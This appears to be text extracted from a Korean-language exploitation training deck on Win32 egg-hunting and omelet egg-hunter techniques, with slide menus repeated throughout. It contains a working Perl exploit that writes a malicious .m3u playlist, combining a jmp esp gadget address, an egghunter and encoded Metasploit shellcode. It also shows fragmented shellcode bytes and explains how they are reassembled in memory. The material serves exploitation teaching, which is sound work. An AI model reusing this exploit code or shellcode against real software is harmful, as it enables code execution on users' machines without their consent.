"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Info
.m3u Playlist File Format
length of junk data is 26039
gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Code (EggHuntingExploit.pl)
my $file= "EggHuntingExploit.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". "\x77\x30\x30\x74". # this is the marker/tag: w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = $padding . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
open($FILE,">$file"); print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode; close($FILE); print "m3u File Created successfully\n";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
What is the Omelet-Egg-Hunter ?쉘코드 단편화 기술(shellcode fragmentation technique)
Skylined(Berend-Jan Wever)에 의해 소개됨 (http://code.google.com/p/w32-seh-omelet-shellcode/)
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용
기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재
최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그)
최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음)
일반적인 에그 헌터보다 크기가 더 크다(about 90bytes)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
오리지널 쉘 코드 단편화 구성
Length of the Egg
Index Number
3bytes Marker
Fragmented ShellCode (1/n , 2/n, 3/n … n/n)
Omelet-Egg-Hunter 코드
메모리 검색 (search through memory)
모든 에그 찾기(look for all egg)
단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack)
조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
!
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
"
Find Marker
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
#
Check length/index
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
#
reproduces the original shellcode at the bottom of the stack
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
$
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
%
Find Marker
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
Check length/index
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
reproduces the original shellcode at the bottom of the stack
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
'
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
(
Find Marker
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
Check length/index
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
reproduces the original shellcode at the bottom of the stack
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
🔟
jumps to the reproduced shellcode and executes it
How to made Omelet-Egg-Hunter ?Track3. Exploitation
